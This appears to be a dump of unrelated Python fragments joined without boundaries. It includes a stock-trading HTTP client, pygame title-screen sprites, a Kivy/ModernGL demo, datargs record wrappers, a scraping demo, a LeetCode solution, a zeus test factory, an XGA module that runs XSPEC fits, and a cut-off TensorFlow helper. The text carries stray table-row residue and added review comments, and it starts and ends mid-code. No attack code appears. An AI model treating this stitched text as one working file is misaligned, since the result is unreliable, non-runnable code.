    def position(self):
        """Current holdings."""
        pass

    @property
    @abc.abstractmethod
    def today_trades(self):
        """Trades executed today."""
        pass

    @property
    @abc.abstractmethod
    def today_entrusts(self):
        """Orders (entrusts) placed today."""
        pass

    @abc.abstractmethod
    def buy(self, stock_id, price: float, amount: int):
        pass

    @abc.abstractmethod
    def sell(self, stock_id, price: float, amount: int):
        pass

    @abc.abstractmethod
    def cancel_entrust(self, entrust_no: str):
        pass
class PAZQRemoteTrader(IRemoteTrader):
    """HTTP client implementation of IRemoteTrader: each operation maps to
    a GET/POST against `self.address + endpoint`, authenticated via the
    'trader-token' header."""

    def _api_get(self, func_name: str):
        # GET <address><func_name>; returns the decoded JSON body, or a
        # fail dict on any network/decoding error.
        try:
            return requests.get(
                self.address + func_name,
                timeout=self.timeout,
                headers={'trader-token': self.token}
            ).json()
        except Exception as e:
            print(e)
            return {'status': 'fail', 'msg': 'Network error.'}

    def _api_post(self, func_name: str, params: dict):
        # POST with query params; mirrors _api_get's error handling.
        # NOTE(review): 'info' holds the raw exception object, which is not
        # JSON-serializable -- confirm callers only inspect it locally.
        try:
            return requests.post(
                self.address + func_name,
                timeout=self.timeout,
                headers={'trader-token': self.token},
                params=params
            ).json()
        except Exception as e:
            return {'status': 'fail', 'msg': 'Network error.', 'info': e}

    def prepare(
        self,
        config_path=None,
        user=None,
        password=None,
        token=None,
        address=None,
        timeout=5,
    ):
        """Store connection settings (from config file or arguments) and
        ping the remote 'prepare' endpoint.

        NOTE(review): when config_path is given, 'token'/'address'/'timeout'
        keys are read unconditionally -- a missing key raises KeyError.
        """
        if config_path is not None:
            account = file2dict(config_path)
            token = account['token']
            #user = account['user']
            #password = account['password']
            address = account['address']
            timeout = account['timeout']
        self.token = token
        self.user = user
        self.password = password
        self.address = address
        self.timeout = timeout
        return self._api_get('prepare')

    @property
    def balance(self):
        return self._api_get("balance")

    @property
    def position(self):
        return self._api_get("position")

    @property
    def today_trades(self):
        return self._api_get("today_trades")

    @property
    def today_entrusts(self):
        return self._api_get("today_entrusts")

    def buy(self, stock_id, price: float, amount: int):
        return self._api_post("buy", {'stock_id': stock_id, 'price': price, 'amount': amount})

    def sell(self, stock_id, price: float, amount: int):
        return self._api_post("sell", {'stock_id': stock_id, 'price': price, 'amount': amount})

    def cancel_entrust(self, entrust_no: str):
        # The remote may answer status=success while the message text still
        # indicates failure; normalize that to status=fail.
        data = self._api_post("cancel_entrust", {'entrust_no': entrust_no})
        if data['status'] == 'success' and 'success' not in data['data']['message']:
            data['status'] = 'fail'
        return data
| 3,284 | 942 |
import pygame, constants, copy
# pygame.init()
pygame.display.set_mode(constants.default_size)
current_path = constants.current_path + "Pixel Images\\"
def load_img(path, colorkey=(255, 255, 255)):
    """Load an image relative to the Pixel Images folder and apply a
    transparency colorkey (white by default)."""
    img = pygame.image.load(current_path + path).convert()
    img.set_colorkey(colorkey)
    return img
def create_path(path: str):
    """
    :param path: path relative to the Pixel Images folder
    :return: the path relative to the project root
    """
    return f"{current_path}{path}"
def darken_except(pic, pos):
    """Darken *pic* in place except for a 20px-radius circle around *pos*.

    A translucent black overlay is drawn over the picture; the circle is
    filled white and white is set as the overlay's colorkey, so that spot
    stays untouched.
    """
    dark_picture = obscure(pic, (0, 0, 0), 200)
    pygame.draw.circle(dark_picture, (255, 255, 255), pos, 20)
    dark_picture.set_colorkey((255, 255, 255))
    pic.blit(dark_picture, (0, 0))
    # (removed a dead trailing `pass` statement)
def switch_base():
    """Toggle the module-level menu background between its clear-sky and
    storm variants."""
    global menu_base
    if menu_base == menu_base_dark:
        menu_base = menu_base_clear
    else:
        menu_base = menu_base_dark
def obscure(pic, color, alpha):
    """Return a translucent overlay surface (not blitted) matching *pic*'s
    size, filled with *color* at the given *alpha*."""
    overlay = pygame.Surface(pic.get_size())
    overlay.fill(color)
    overlay.set_alpha(alpha)
    return overlay
# intro
# Lightning bolt sprites for the storm variant of the title screen.
small_bolt = load_img("small_bolt.png", (0, 0, 0))
medium_bolt = load_img("medium_bolt.png", (0, 0, 0))
large_bolt = load_img("large_bolt.png", (0, 0, 0))
clearCloud = pygame.image.load(create_path("Clear Clouds.png"))
stormCloud = pygame.image.load(create_path("Storm Clouds.png"))
# Vertical offset (px) at which the mountain range is drawn.
mountain_range_height = 200
menu_base = pygame.transform.scale(load_img("main_menu.png"), constants.size)
mountain_1 = load_img("Title Screen Mountain.png", (0, 0, 0))
mountain_2 = load_img("Title Screen Mountain 2.png", (0, 0, 0))
mountain_3 = load_img("Title Screen Mountain 3.png", (0, 0, 0))
# Green ground below the mountains, then the three mountain layers.
pygame.draw.rect(menu_base, (139, 195, 74), pygame.Rect((0, mountain_range_height + mountain_1.get_height() - 20), menu_base.get_size()))
menu_base.blit(mountain_1, (-20, mountain_range_height))
menu_base.blit(mountain_2, (200, mountain_range_height))
menu_base.blit(mountain_3, (120, mountain_range_height))
# Clear-sky variant: base plus white clouds.
menu_base_clear = copy.copy(menu_base)
menu_base = menu_base_clear
menu_base_clear.blit(pygame.transform.scale(clearCloud, (60, 20)), (15, 20))
menu_base_clear.blit(pygame.transform.scale(clearCloud, (70, 30)), (70, 40))
menu_base_clear.blit(clearCloud, (120, 0))
menu_base_clear.blit(pygame.transform.scale(clearCloud, (79, 30)), (250, 30))
menu_base_clear.blit(clearCloud, (275, 0))
# Storm variant: darkened base plus storm clouds and lightning bolts.
# NOTE(review): copied AFTER clear clouds were blitted, so the dark
# variant also contains the clear clouds underneath -- confirm intended.
menu_base_dark = copy.copy(menu_base)
dark_picture = obscure(menu_base_dark, (0, 0, 0), 200)
# drawing on all the lightnings
menu_base_dark.blit(dark_picture, (0, 0))
menu_base_dark.blit(pygame.transform.scale(stormCloud, (60, 20)), (15, 20))
menu_base_dark.blit(pygame.transform.scale(stormCloud, (70, 30)), (70, 40))
menu_base_dark.blit(stormCloud, (120, 0))
menu_base_dark.blit(pygame.transform.scale(stormCloud, (79, 30)), (250, 30))
menu_base_dark.blit(stormCloud, (275, 0))
menu_base_dark.blit(small_bolt, (40, 40))
menu_base_dark.blit(small_bolt, (200, 50))
menu_base_dark.blit(medium_bolt, (100, 70))
menu_base_dark.blit(medium_bolt, (350, 10))
menu_base_dark.blit(medium_bolt, (150, 20))
menu_base_dark.blit(medium_bolt, (300, 60))
# map and notifs
demo_map = pygame.image.load(create_path("Demo Map.png")).convert()
demo_map = pygame.transform.scale(demo_map, (360, 360))
# Black mask matching the demo map, used for fog-of-war style overlays.
demo_mask = demo_map.copy()
demo_mask.fill((0, 0, 0))
simple_map = pygame.image.load(create_path("Simple Map.png")).convert()  # 150 by 150
lava = pygame.image.load(create_path("Lava.png"))
poison = pygame.image.load(create_path("Poison Lake.png"))
cactus = pygame.image.load(create_path("Cactus1.png"))
import struct
import ModernGL
from kivy.app import App
from kivy.core.window import Window
from kivy.graphics import Callback
from kivy.uix.widget import Widget
class CustomWidget(Widget):
    """Kivy widget that renders a colored triangle through ModernGL."""

    def __init__(self, **kwargs):
        super(CustomWidget, self).__init__(**kwargs)
        with self.canvas:
            self.ctx = ModernGL.create_context()
            # Bug fix: the original had stray `)` and `]` tokens around the
            # shader source strings, which made this file a SyntaxError.
            # The shaders are now passed as the vertex_shader /
            # fragment_shader keyword arguments of Context.program().
            self.prog = self.ctx.program(
                vertex_shader='''
                    #version 330
                    uniform vec2 WindowSize;
                    in vec2 in_vert;
                    in vec3 in_color;
                    out vec3 v_color;
                    void main() {
                        v_color = in_color;
                        gl_Position = vec4(in_vert / WindowSize * 2.0, 0.0, 1.0);
                    }
                ''',
                fragment_shader='''
                    #version 330
                    in vec3 v_color;
                    out vec4 f_color;
                    void main() {
                        f_color = vec4(v_color, 1.0);
                    }
                ''',
            )
            self.window_size = self.prog.uniforms['WindowSize']
            # Three vertices: (x, y, r, g, b) each -- an RGB triangle.
            self.vbo = self.ctx.buffer(struct.pack(
                '15f',
                0.0, 100.0, 1.0, 0.0, 0.0,
                -86.0, -50.0, 0.0, 1.0, 0.0,
                86.0, -50.0, 0.0, 0.0, 1.0,
            ))
            self.vao = self.ctx.simple_vertex_array(self.prog, self.vbo, ['in_vert', 'in_color'])
            Callback(self.draw)

    def draw(self, *args):
        """Render the triangle, tracking the current window size."""
        self.width, self.height = Window.size
        self.ctx.viewport = (0, 0, self.width, self.height)
        self.ctx.clear(0.9, 0.9, 0.9)
        self.ctx.enable(ModernGL.BLEND)
        self.window_size.value = (self.width, self.height)
        self.vao.render()

    def ask_update(self, *args):
        """Request a canvas redraw."""
        self.canvas.ask_update()
class MainApp(App):
    """Kivy application whose root widget is the ModernGL canvas."""

    def build(self):
        return CustomWidget()
if __name__ == '__main__':
    # Start the Kivy event loop.
    MainApp().run()
| 2,030 | 672 |
import inspect
from abc import ABCMeta, abstractmethod
from typing import Any, Generic, List, Mapping, Optional, Type, TypeVar
from .error import NotARecordClass
T = TypeVar("T")
FieldType = TypeVar("FieldType")
class DatargsParams:
    """Per-class datargs configuration.

    `parser` holds keyword arguments forwarded to the argument parser;
    it defaults to an empty mapping when omitted or falsy.
    """

    def __init__(self, parser: Optional[Mapping[str, Any]] = None):
        self.parser = parser if parser else {}
class RecordField(Generic[FieldType, T], metaclass=ABCMeta):
    """
    Uniform, backend-agnostic view of a single field of a dataclass or
    attrs class.
    """
    # The wrapped backend-specific field descriptor.
    field: FieldType
    def __init__(self, field):
        self.field = field
    @abstractmethod
    def is_required(self) -> bool:
        """
        Return whether field is required.
        """
        ...
    @property
    @abstractmethod
    def default(self) -> T:
        """The field's default value."""
        ...
    @property
    @abstractmethod
    def converter(self):
        """The converter attached to the field (backend specific)."""
        ...
    @property
    @abstractmethod
    def name(self) -> str:
        """The field's name."""
        ...
    @property
    @abstractmethod
    def type(self) -> Type[T]:
        """The field's declared type."""
        ...
    @property
    @abstractmethod
    def metadata(self) -> Mapping[str, Any]:
        """The field's metadata mapping."""
        ...
    def has_default(self) -> bool:
        """
        Helper method to indicate whether a field has a default value.
        Used to make intention clearer in call sites.
        """
        return not self.is_required()
class RecordClass(Generic[FieldType], metaclass=ABCMeta):
    """
    Abstract base class for dataclasses or attrs classes.
    Concrete subclasses register themselves automatically (see
    ``__init_subclass__``) so that ``wrap_class`` can pick the right
    implementation for a given record class.
    """
    # The name of the attribute that holds field definitions
    fields_attribute: str = "__invalid__"
    # The type to wrap fields with
    field_wrapper_type: Type[RecordField]
    # Registry of concrete subclasses, filled in by __init_subclass__.
    # NOTE: deliberately a shared class-level list mutated by all subclasses.
    _implementors: List[Type["RecordClass"]] = []
    def __init_subclass__(cls, **kwargs) -> None:
        # Auto-register every non-abstract subclass as a candidate wrapper.
        super().__init_subclass__()
        if not inspect.isabstract(cls):
            cls._implementors.append(cls)
    def __init__(self, cls) -> None:
        # The wrapped record class (a dataclass or an attrs class).
        self.cls: type = cls
    @property
    def datargs_params(self) -> DatargsParams:
        # Fall back to defaults when the class carries no datargs configuration.
        return getattr(self.cls, "__datargs_params__", DatargsParams())
    @property
    def parser_params(self) -> Mapping[str, Any]:
        return self.datargs_params.parser
    @property
    def name(self) -> str:
        return self.cls.__name__
    @abstractmethod
    def fields_dict(self) -> Mapping[str, RecordField]:
        """
        Returns a mapping of field names to field wrapper classes.
        """
        pass
    @classmethod
    def can_wrap_class(cls, potential_record_class) -> bool:
        """
        Returns whether this class is the appropriate implementation for wrapping `potential_record_class`.
        """
        # Presence of the implementation-specific fields attribute marks a match.
        return getattr(potential_record_class, cls.fields_attribute, None) is not None
    @classmethod
    def wrap_class(cls, record_class) -> "RecordClass":
        """
        Wrap `record_class` with the appropriate wrapper.

        Raises NotARecordClass when no registered implementor matches.
        """
        for candidate in cls._implementors:
            if candidate.can_wrap_class(record_class):
                return candidate(record_class)
        # NOTE(review): reaching here with __attrs_attrs__ present implies no
        # attrs-aware implementor was registered — presumably because attrs is
        # not installed; confirm against the attrs wrapper module.
        if getattr(record_class, "__attrs_attrs__", None) is not None:
            raise NotARecordClass(
                f"can't accept '{record_class.__name__}' because it is an attrs class and attrs is not installed"
            )
        raise NotARecordClass(
            f"class '{record_class.__name__}' is not a dataclass nor an attrs class"
        )
    @classmethod
    def get_field(cls, field: FieldType) -> RecordField:
        """
        Wrap field with field classes with a uniform interface.
        """
        return cls.field_wrapper_type(field)
# --- (removed extraction artifact: table-row residue between concatenated files) ---
# type: ignore
import asyncio
from scrapeacademy import context, run
async def get_concurrent(url):
    """Fetch *url* 10 times concurrently, printing each result as it completes.

    :param url: the URL handed to ``context.get``.
    """
    # Get a same page 10 times simultaneously.
    # asyncio.wait() requires Task/Future objects: passing bare coroutines has
    # been deprecated since Python 3.8 and raises TypeError from 3.12, so each
    # coroutine is wrapped in a task explicitly.
    tasks = [asyncio.ensure_future(context.get(url)) for _ in range(10)]
    n = 1
    while tasks:
        # FIRST_COMPLETED returns as soon as any task finishes; `tasks` is
        # rebound to the still-pending set each iteration.
        done, tasks = await asyncio.wait(tasks, return_when=asyncio.FIRST_COMPLETED)
        for result in done:
            print(f"done #{n}", result.result()[:10])
            n += 1
    print("done")
# Drive the demo coroutine to completion (run() presumably wraps
# asyncio.run — confirm against scrapeacademy's documentation).
run(get_concurrent("https://www.python.jp/"))
# --- (removed extraction artifact: table-row residue between concatenated files) ---
class Solution:
    """LeetCode 1026: maximum difference between a node and any of its ancestors."""

    def maxAncestorDiff(self, root: "Optional[TreeNode]") -> int:
        """Return max |ancestor.val - descendant.val| over all ancestor/descendant pairs.

        Fixes: the annotation is quoted because Optional/TreeNode are not
        imported in this file (an unquoted annotation raises NameError at
        definition time); stray table-residue tokens fused onto the final
        return line were removed; an empty tree now returns 0 instead of
        raising AttributeError.
        """
        def dfs(node, mn, mx):
            # mn/mx are the min/max values seen on the root-to-node path so far.
            if not node:
                return 0
            res = max(abs(node.val - mn), abs(node.val - mx))
            mn, mx = min(mn, node.val), max(mx, node.val)
            return max(res, dfs(node.left, mn, mx), dfs(node.right, mn, mx))
        # Guard: the original assumed a non-empty tree.
        if not root:
            return 0
        return dfs(root, root.val, root.val)
# ex7_7.py
def f(n):
    """
    Return n! computed recursively.

    n: integer, n >= 0.
    """
    return 1 if n == 0 else n * f(n - 1)
# Quick sanity checks when run as a script.
if __name__ == "__main__":
    print(f(0))
    print(f(1))
    print(f(3))
    print(f(5))
# --- (removed extraction artifact: table-row residue between concatenated files) ---
import factory
import factory.faker
from datetime import timedelta
from faker import Factory
# Shared Faker instance used by the lazy attributes in the factories below.
faker = Factory.create()
from zeus import models
from zeus.config import db
from zeus.utils import timezone
from .base import ModelFactory
class RevisionFactory(ModelFactory):
    """Factory producing ``zeus.models.Revision`` instances for tests."""
    # Fake sha1 digest standing in for the commit hash.
    sha = factory.Faker("sha1")
    repository = factory.SubFactory("zeus.factories.RepositoryFactory")
    repository_id = factory.SelfAttribute("repository.id")
    # Commit message shaped like "subject\n\nbody" from two fake sentences.
    message = factory.LazyAttribute(
        lambda o: "{}\n\n{}".format(faker.sentence(), faker.sentence())
    )
    # Backdate creation by 30 minutes so the revision is not brand new.
    date_created = factory.LazyAttribute(
        lambda o: timezone.now() - timedelta(minutes=30)
    )
    @factory.post_generation
    def authors(self, create, extracted, **kwargs):
        # Only touch the database when the instance was actually persisted;
        # note the flush happens even when no authors were passed in.
        if not create:
            return
        if extracted:
            self.authors = extracted
        db.session.flush()
    class Meta:
        model = models.Revision
# --- (removed extraction artifact: table-row residue between concatenated files) ---
# This code is a part of XMM: Generate and Analyse (XGA), a module designed for the XMM Cluster Survey (XCS).
# Last modified by David J Turner (david.turner@sussex.ac.uk) 09/06/2021, 16:34. Copyright (c) David J Turner
import os
import warnings
from functools import wraps
# from multiprocessing.dummy import Pool
from multiprocessing import Pool
from subprocess import Popen, PIPE, TimeoutExpired
from typing import Tuple, Union
import fitsio
import pandas as pd
from fitsio import FITS
from tqdm import tqdm
from .. import XSPEC_VERSION
from ..exceptions import XSPECFitError, MultipleMatchError, NoMatchFoundError, XSPECNotFoundError
from ..samples.base import BaseSample
from ..sources import BaseSource
def execute_cmd(x_script: str, out_file: str, src: str, run_type: str, timeout: float) \
        -> Tuple[Union[FITS, str], str, bool, list, list]:
    """
    This function is called for the local compute option. It will run the supplied XSPEC script, then check
    parse the output for errors and check that the expected output file has been created.
    :param str x_script: The path to an XSPEC script to be run.
    :param str out_file: The expected path for the output file of that XSPEC script.
    :param str src: A string representation of the source object that this fit is associated with.
    :param str run_type: A flag that tells this function what type of run this is; e.g. fit or conv_factors.
    :param float timeout: The length of time (in seconds) which the XSPEC script is allowed to run for before being
        killed.
    :return: FITS object of the results, string repr of the source associated with this fit, boolean variable
        describing if this fit can be used, list of any errors found, list of any warnings found.
    :rtype: Tuple[Union[FITS, str], str, bool, list, list]
    """
    if XSPEC_VERSION is None:
        raise XSPECNotFoundError("There is no XSPEC installation detectable on this machine.")
    # We assume the output will be usable to start with
    usable = True
    cmd = "xspec - {}".format(x_script)
    # I add exec to the beginning to make sure that the command inherits the same process ID as the shell, which
    # allows the timeout to kill the XSPEC run rather than the shell process. Entirely thanks to slayton on
    # https://stackoverflow.com/questions/4789837/how-to-terminate-a-python-subprocess-launched-with-shell-true
    xspec_proc = Popen("exec " + cmd, shell=True, stdout=PIPE, stderr=PIPE)
    # This makes sure the process is killed if it does timeout
    try:
        out, err = xspec_proc.communicate(timeout=timeout)
    except TimeoutExpired:
        xspec_proc.kill()
        out, err = xspec_proc.communicate()
        # Need to infer the name of the source to supply it in the warning
        source_name = x_script.split('/')[-1].split("_")[0]
        warnings.warn("An XSPEC fit for {} has timed out".format(source_name))
        usable = False
    # Decode the captured byte streams and split them into lines for scanning
    out = out.decode("UTF-8").split("\n")
    err = err.decode("UTF-8").split("\n")
    # XSPEC marks problems with ***Error / ***Warning prefixes on both streams
    err_out_lines = [line.split("***Error: ")[-1] for line in out if "***Error" in line]
    warn_out_lines = [line.split("***Warning: ")[-1] for line in out if "***Warning" in line]
    err_err_lines = [line.split("***Error: ")[-1] for line in err if "***Error" in line]
    warn_err_lines = [line.split("***Warning: ")[-1] for line in err if "***Warning" in line]
    # The run only stays usable if it neither timed out nor emitted error lines
    if usable and len(err_out_lines) == 0 and len(err_err_lines) == 0:
        usable = True
    else:
        usable = False
    error = err_out_lines + err_err_lines
    warn = warn_out_lines + warn_err_lines
    if os.path.exists(out_file + "_info.csv") and run_type == "fit":
        # The original version of the xga_output.tcl script output everything as one nice neat fits file
        # but life is full of extraordinary inconveniences and for some reason it didn't work if called from
        # a Jupyter Notebook. So now I'm going to smoosh all the csv outputs into one fits.
        results = pd.read_csv(out_file + "_results.csv", header="infer")
        # This is the csv with the fit results in, creates new fits file and adds in
        fitsio.write(out_file + ".fits", results.to_records(index=False), extname="results", clobber=True)
        del results
        # The information about individual spectra, exposure times, luminosities etc.
        spec_info = pd.read_csv(out_file + "_info.csv", header="infer")
        # Gets added into the existing file
        fitsio.write(out_file + ".fits", spec_info.to_records(index=False), extname="spec_info")
        del spec_info
        # This finds all of the matching spectrum plot csvs were generated
        rel_path = "/".join(out_file.split('/')[0:-1])
        # This is mostly just used to find how many files there are
        spec_tabs = [rel_path + "/" + sp for sp in os.listdir(rel_path)
                     if "{}_spec".format(out_file) in rel_path + "/" + sp]
        for spec_i in range(1, len(spec_tabs)+1):
            # Loop through and redefine names like this to ensure they're in the right order
            spec_plot = pd.read_csv(out_file + "_spec{}.csv".format(spec_i), header="infer")
            # Adds all the plot tables into the existing fits file in the right order
            fitsio.write(out_file + ".fits", spec_plot.to_records(index=False), extname="plot{}".format(spec_i))
            del spec_plot
        # This reads in the fits we just made
        with FITS(out_file + ".fits") as res_tables:
            tab_names = [tab.get_extname() for tab in res_tables]
            if "results" not in tab_names or "spec_info" not in tab_names:
                usable = False
        # I'm going to try returning the file path as that should be pickleable
        res_tables = out_file + ".fits"
    elif os.path.exists(out_file) and run_type == "conv_factors":
        res_tables = out_file
        usable = True
    else:
        res_tables = None
        usable = False
    return res_tables, src, usable, error, warn
def xspec_call(xspec_func):
    """
    This is used as a decorator for functions that produce XSPEC scripts. Depending on the
    system that XGA is running on (and whether the user requests parallel execution), the method of
    executing the XSPEC commands will change. This supports multi-threading.

    The wrapped function must return (script_list, paths, cores, run_type, src_inds, radii, timeout);
    the wrapper runs the scripts via execute_cmd in a multiprocessing pool and pushes the parsed
    results into the source objects passed as the first argument.
    :return: The source object(s) passed in, with fit results attached.
    """
    @wraps(xspec_func)
    def wrapper(*args, **kwargs):
        # The first argument of all of these XSPEC functions will be the source object (or a list of),
        # so rather than return them from the XSPEC model function I'll just access them like this.
        if isinstance(args[0], BaseSource):
            sources = [args[0]]
        elif isinstance(args[0], (list, BaseSample)):
            sources = args[0]
        else:
            raise TypeError("Please pass a source object, or a list of source objects.")
        # This is the output from whatever function this is a decorator for
        # First return is a list of paths of XSPEC scripts to execute, second is the expected output paths,
        # and 3rd is the number of cores to use.
        # run_type describes the type of XSPEC script being run, for instance a fit or a fakeit run to measure
        # countrate to luminosity conversion constants
        script_list, paths, cores, run_type, src_inds, radii, timeout = xspec_func(*args, **kwargs)
        # Map from a source's repr back to its index so results can be routed to the right object
        src_lookup = {repr(src): src_ind for src_ind, src in enumerate(sources)}
        rel_src_repr = [repr(sources[src_ind]) for src_ind in src_inds]
        # Make sure the timeout is converted to seconds, then just stored as a float
        timeout = timeout.to('second').value
        # This is what the returned information from the execute command gets stored in before being parceled out
        # to source and spectrum objects
        results = {s: [] for s in src_lookup}
        # NOTE(review): 'desc' is only bound for 'fit' and 'conv_factors'; any other
        # run_type would hit a NameError at the tqdm call below — confirm run_type
        # is always one of these two values.
        if run_type == "fit":
            desc = "Running XSPEC Fits"
        elif run_type == "conv_factors":
            desc = "Running XSPEC Simulations"
        if len(script_list) > 0:
            # This mode runs the XSPEC locally in a multiprocessing pool.
            with tqdm(total=len(script_list), desc=desc) as fit, Pool(cores) as pool:
                def callback(results_in):
                    """
                    Callback function for the apply_async pool method, gets called when a task finishes
                    and something is returned.
                    """
                    nonlocal fit  # The progress bar will need updating
                    nonlocal results  # The dictionary the command call results are added to
                    if results_in[0] is None:
                        fit.update(1)
                        return
                    else:
                        res_fits, rel_src, successful, err_list, warn_list = results_in
                        results[rel_src].append([res_fits, successful, err_list, warn_list])
                        fit.update(1)
                for s_ind, s in enumerate(script_list):
                    pth = paths[s_ind]
                    src = rel_src_repr[s_ind]
                    pool.apply_async(execute_cmd, args=(s, pth, src, run_type, timeout), callback=callback)
                pool.close()  # No more tasks can be added to the pool
                pool.join()  # Joins the pool, the code will only move on once the pool is empty.
        elif len(script_list) == 0:
            warnings.warn("All XSPEC operations had already been run.")
        # Now we assign the fit results to source objects
        for src_repr in results:
            # Made this lookup list earlier, using string representations of source objects.
            # Finds the ind of the list of sources that we should add these results to
            ind = src_lookup[src_repr]
            s = sources[ind]
            # This flag tells this method if the current set of fits are part of an annular spectra or not
            ann_fit = False
            ann_results = {}
            ann_lums = {}
            ann_obs_order = {}
            for res_set in results[src_repr]:
                if len(res_set) != 0 and res_set[1] and run_type == "fit":
                    with FITS(res_set[0]) as res_table:
                        global_results = res_table["RESULTS"][0]
                        model = global_results["MODEL"].strip(" ")
                        # Just define this to check if this is an annular fit or not
                        first_key = res_table["SPEC_INFO"][0]["SPEC_PATH"].strip(" ").split("/")[-1].split('ra')[-1]
                        first_key = first_key.split('_spec.fits')[0]
                        if "_ident" in first_key:
                            ann_fit = True
                        inst_lums = {}
                        obs_order = []
                        for line_ind, line in enumerate(res_table["SPEC_INFO"]):
                            sp_info = line["SPEC_PATH"].strip(" ").split("/")[-1].split("_")
                            # Want to derive the spectra storage key from the file name, this strips off some
                            # unnecessary info
                            sp_key = line["SPEC_PATH"].strip(" ").split("/")[-1].split('ra')[-1].split('_spec.fits')[0]
                            # If its not an AnnularSpectra fit then we can just fetch the spectrum from the source
                            # the normal way
                            if not ann_fit:
                                # This adds ra back on, and removes any ident information if it is there
                                sp_key = 'ra' + sp_key
                                # Finds the appropriate matching spectrum object for the current table line
                                spec = s.get_products("spectrum", sp_info[0], sp_info[1], extra_key=sp_key)[0]
                            else:
                                obs_order.append([sp_info[0], sp_info[1]])
                                ann_id = int(sp_key.split("_ident")[-1].split("_")[1])
                                sp_key = 'ra' + sp_key.split('_ident')[0]
                                first_part = sp_key.split('ri')[0]
                                second_part = "_" + "_".join(sp_key.split('ro')[-1].split("_")[1:])
                                ann_sp_key = first_part + "ar" + "_".join(radii[ind].value.astype(str)) + second_part
                                ann_specs = s.get_products("combined_spectrum", extra_key=ann_sp_key)
                                if len(ann_specs) > 1:
                                    raise MultipleMatchError("I have found multiple matches for that AnnularSpectra, "
                                                             "this is the developers fault, not yours.")
                                elif len(ann_specs) == 0:
                                    raise NoMatchFoundError("Somehow I haven't found the AnnularSpectra that you "
                                                            "fitted, this is the developers fault, not yours")
                                else:
                                    ann_spec = ann_specs[0]
                                    spec = ann_spec.get_spectra(ann_id, sp_info[0], sp_info[1])
                            # Adds information from this fit to the spectrum object.
                            spec.add_fit_data(str(model), line, res_table["PLOT"+str(line_ind+1)])
                            # The add_fit_data method formats the luminosities nicely, so we grab them back out
                            # to help grab the luminosity needed to pass to the source object 'add_fit_data' method
                            processed_lums = spec.get_luminosities(model)
                            if spec.instrument not in inst_lums:
                                inst_lums[spec.instrument] = processed_lums
                        # Ideally the luminosity reported in the source object will be a PN lum, but its not impossible
                        # that a PN value won't be available. - it shouldn't matter much, lums across the cameras are
                        # consistent
                        if "pn" in inst_lums:
                            chosen_lums = inst_lums["pn"]
                        # mos2 generally better than mos1, as mos1 has CCD damage after a certain point in its life
                        elif "mos2" in inst_lums:
                            chosen_lums = inst_lums["mos2"]
                        else:
                            chosen_lums = inst_lums["mos1"]
                        if ann_fit:
                            ann_results[spec.annulus_ident] = global_results
                            ann_lums[spec.annulus_ident] = chosen_lums
                            ann_obs_order[spec.annulus_ident] = obs_order
                        elif not ann_fit:
                            # Push global fit results, luminosities etc. into the corresponding source object.
                            s.add_fit_data(model, global_results, chosen_lums, sp_key)
                elif len(res_set) != 0 and res_set[1] and run_type == "conv_factors":
                    res_table = pd.read_csv(res_set[0], dtype={"lo_en": str, "hi_en": str})
                    # Gets the model name from the file name of the output results table
                    model = res_set[0].split("_")[-3]
                    # We can infer the storage key from the name of the results table, just makes it easier to
                    # grab the correct spectra
                    storage_key = res_set[0].split('/')[-1].split(s.name)[-1][1:].split(model)[0][:-1]
                    # Grabs the ObsID+instrument combinations from the headers of the csv. Makes sure they are unique
                    # by going to a set (because there will be two columns for each ObsID+Instrument, rate and Lx)
                    # First two columns are skipped because they are energy limits
                    combos = list(set([c.split("_")[1] for c in res_table.columns[2:]]))
                    # Getting the spectra for each column, then assigning rates and lums
                    for comb in combos:
                        spec = s.get_products("spectrum", comb[:10], comb[10:], extra_key=storage_key)[0]
                        spec.add_conv_factors(res_table["lo_en"].values, res_table["hi_en"].values,
                                              res_table["rate_{}".format(comb)].values,
                                              res_table["Lx_{}".format(comb)].values, model)
                elif len(res_set) != 0 and not res_set[1]:
                    for err in res_set[2]:
                        raise XSPECFitError(err)
            if ann_fit:
                # We fetch the annular spectra object that we just fitted, searching by using the set ID of
                # the last spectra that was opened in the loop
                ann_spec = s.get_annular_spectra(set_id=spec.set_ident)
                try:
                    ann_spec.add_fit_data(model, ann_results, ann_lums, ann_obs_order)
                    # The most likely reason for running XSPEC fits to a profile is to create a temp. profile
                    # so we check whether constant*tbabs*apec (single_temp_apec function)has been run and if so
                    # generate a Tx profile automatically
                    if model == "constant*tbabs*apec":
                        temp_prof = ann_spec.generate_profile(model, 'kT', 'keV')
                        s.update_products(temp_prof)
                        # Normalisation profiles can be useful for many things, so we generate them too
                        norm_prof = ann_spec.generate_profile(model, 'norm', 'cm^-5')
                        s.update_products(norm_prof)
                        if 'Abundanc' in ann_spec.get_results(0, 'constant*tbabs*apec'):
                            met_prof = ann_spec.generate_profile(model, 'Abundanc', '')
                            s.update_products(met_prof)
                    else:
                        raise NotImplementedError("How have you even managed to fit this model to a profile?! Its not"
                                                  " supported yet.")
                except ValueError:
                    warnings.warn("{src} annular spectra profile fit was not successful".format(src=ann_spec.src_name))
        # If only one source was passed, turn it back into a source object rather than a source
        # object in a list.
        if len(sources) == 1:
            sources = sources[0]
        return sources
    return wrapper
# --- (removed extraction artifact: table-row residue between concatenated files) ---
import numpy as np
import tensorflow as tf
from utils.utils import *
from utils.utils_nn import *
###########################################################
##### functions to generate parameter #####
###########################################################
#### function to generate knowledge-base parameters for ELLA_tensorfactor layer
def new_ELLA_KB_param(shape, layer_number, task_number, reg_type, init_tensor=None, trainable=True):
    """Create (or pass through) the shared knowledge-base variable for one layer.

    :param shape: shape of the KB variable.
    :param layer_number: layer index, used in the variable name.
    :param task_number: task index (currently unused in the name — see the
        commented-out naming scheme below).
    :param reg_type: regularizer handed to tf.get_variable.
    :param init_tensor: None -> fresh variable; np.ndarray -> variable
        initialized from the array; anything else is assumed to be an existing
        variable and returned unchanged.
    :param trainable: whether a newly created variable is trainable.
    :return: the KB variable.
    """
    #kb_name = 'KB_'+str(layer_number)+'_'+str(task_number)
    kb_name = 'KB_'+str(layer_number)
    if init_tensor is None:
        param_to_return = tf.get_variable(name=kb_name, shape=shape, dtype=tf.float32, regularizer=reg_type, trainable=trainable)
    elif isinstance(init_tensor, np.ndarray):
        # isinstance instead of type(...) == np.ndarray: also accepts ndarray subclasses
        param_to_return = tf.get_variable(name=kb_name, shape=shape, dtype=tf.float32, regularizer=reg_type, initializer=tf.constant_initializer(init_tensor), trainable=trainable)
    else:
        param_to_return = init_tensor
    return param_to_return
#### function to generate task-specific parameters for ELLA_tensorfactor layer
def new_ELLA_cnn_deconv_TS_param(shape, layer_number, task_number, reg_type):
